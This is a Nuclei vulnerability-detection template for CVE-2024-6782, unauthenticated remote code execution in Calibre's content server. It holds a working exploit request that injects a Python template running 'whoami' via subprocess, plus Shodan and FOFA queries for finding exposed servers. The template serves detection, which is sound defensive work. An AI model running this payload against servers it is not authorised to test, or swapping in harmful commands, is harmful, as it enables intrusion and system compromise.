CVE-2024-6782.yaml

id: CVE-2024-6782

info:
  name: Calibre <= 7.14.0 Remote Code Execution
  author: DhiyaneshDK
  severity: critical
  description: |
    Unauthenticated remote code execution via Calibre’s content server in Calibre <= 7.14.0.
  impact: |
    Unauthenticated attackers can execute arbitrary Python code through the content server's template functionality, achieving complete system compromise.
  remediation: |
    Update Calibre to version 7.15.0 or later to address the remote code execution vulnerability.
  reference:
    - https://starlabs.sg/advisories/24/24-6781/
  classification:
    cve-id: CVE-2024-6782
    cwe-id: CWE-863
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    epss-score: 0.93876
    epss-percentile: 0.99866
    cpe: cpe:2.3:a:calibre-ebook:calibre:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: calibre-ebook
    product: calibre
    shodan-query: html:"Calibre"
    fofa-query: "Server: calibre"
    max-request: 2
  tags: cve,cve2024,calibre,rce,vuln,vkev

http:
  - raw:
      - |
        GET /interface-data/books-init HTTP/1.1
        Host: {{Hostname}}
        Referer: {{RootURL}}

    extractors:
      - type: json
        name: book_ids
        internal: true
        json:
          - '.search_result.book_ids[0]'

  - raw:
      - |
        POST /cdb/cmd/list HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        [
            ["template"],
            "",
            "",
            "",
            {{book_ids}},
           "python:def evaluate(a, b):\n  import subprocess\n  try:\n    return subprocess.check_output(['cmd.exe', '/c', 'whoami'])\n  except Exception:\n    return subprocess.check_output(['sh', '-c', 'whoami'])\n"
        ]

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "b'([^']+)"

      - type: word
        part: content_type
        words:
          - "application/json"

      - type: status
        status:
          - 200